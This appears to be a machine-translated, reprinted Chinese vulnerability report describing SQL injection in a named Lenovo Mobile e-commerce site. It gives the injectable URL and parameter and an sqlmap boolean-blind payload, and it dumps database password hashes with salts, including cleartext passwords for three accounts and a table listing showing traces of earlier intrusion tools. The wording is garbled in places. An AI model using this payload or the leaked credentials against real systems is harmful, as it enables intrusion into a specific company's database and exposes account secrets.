1. This site, Lenovo Mobile e-commerce system, looks like a cow B:
Http://ec.lenovomobile.com/
2. injection is allowed here:
Http://ec.lenovomobile.com/WebForm/Other/Other_download/Other_DownLoad_ListInfo.aspx? List_Name = Lenovo Mobile Cooperative Bank www.2cto.com
3. What about SA running:
4. You can span multiple databases:
5. weak passwords for multiple database accounts:
Sqlmap identified the following injection points with a total of 0 HTTP (s) requests:
---
Place: GET
Parameter: List_Name
Type: boolean-based blind
Title: AND boolean-based blind-WHERE or HAVING clause
Payload: List_Name = Lenovo Mobile Cooperative Bank 'AND 6011 = 6011 AND 'hhoo' = 'hhoo
---
Database management system users password hashes:
[*] Sa [1]:
Password hash: Encrypted
Header: 0x0100
Salt: b0675249
Mixedcase: 76ec63baa2ca005f95417ee92c62e5dc0d2a2707
Uppercase: 2c2812de9a617e1108f39c388b5252c274bebe9e
[*] Shenjx [1]:
Password hash: Encrypted
Header: 0x0100
Salt: 3e74822b
Mixedcase: a8b269e35e354d5c51ae092ac3fa75a7b1dba093
Uppercase: a8b269e35e354d5c51ae092ac3fa75a7b1dba093
Clear-text password: 654321
[*] Swwl [1]:
Password hash: Encrypted
Header: 0x0100
Salt: b575e507
Mixedcase: b98bcb343331377b5ba7a26a09e83a51821c2f96
Uppercase: fa0950ee393ffbb1980d997bce410845398f0219
Clear-text password: swwl
[*] Wends [1]:
Password hash: Encrypted
Header: 0x0100
Salt: 1a76751d
Mixedcase: f147fd28495401d6f84e98be0ba48bb05226b4e1
Uppercase: e046486691b981689f41de885727f169f0850578
Clear-text password: wends
6. Check the table information of the current database "LMECOTHER". Someone has been here before, and left the temporary tables of D99 and pangolin:
Database: LMECOTHER
[38 tables]
+ -------------------------------------------------- +
| Dbo. D99_CMD |
| Dbo. D99_Tmp |
| Dbo. Other_Address_List |
| Dbo. Other_Address_Org |
| Dbo. Other_BBS_Forum |
| Dbo. Other_BBS_ForumGroups |
| Dbo. Other_BBS_Posts |
| Dbo. Other_BBS_RePosts |
| Dbo. Other_BBS_Users |
| Dbo. Other_ClickStat |
| Dbo. Other_CusLine |
| Dbo. Other_CusLine_Type |
| Dbo. Other_DownLoad_KnowLedge_Type |
| Dbo. Other_DownLoad_List |
| Dbo. Other_DownLoad_List_Type |
| Dbo. Other_DownLoad_Pic |
| Dbo. Other_DownLoad_Tools |
| Dbo. Other_DownLoad_knowledge |
| Dbo. Other_Link |
| Dbo. Other_Rule |
| Dbo. Other_Survey |
| Dbo. Other_Survey_Item |
| Dbo. Other_Survey_Result |
| Dbo. View_Forum |
| Dbo. View_PostList |
| Dbo. dtproperties |
| Dbo. kill_kk |
| Dbo. other_CustMailInfo |
| Dbo. other_CustMailView |
| Dbo. other_Notice |
| Dbo. other_Notice_New |
| Dbo. other_Notification |
| Dbo. other_NotificationObj |
| Dbo. other_icationicationobj_new |
| Dbo. other_icationication_new |
| Dbo. pangolin_test_table |
| Dbo. sysconstraints |
| Dbo. syssegments |
+ -------------------------------------------------- +
Solution: send gifts. What else can I do!
Copyright statement: reprinted, please indicate the source: Feng Xiaoxiao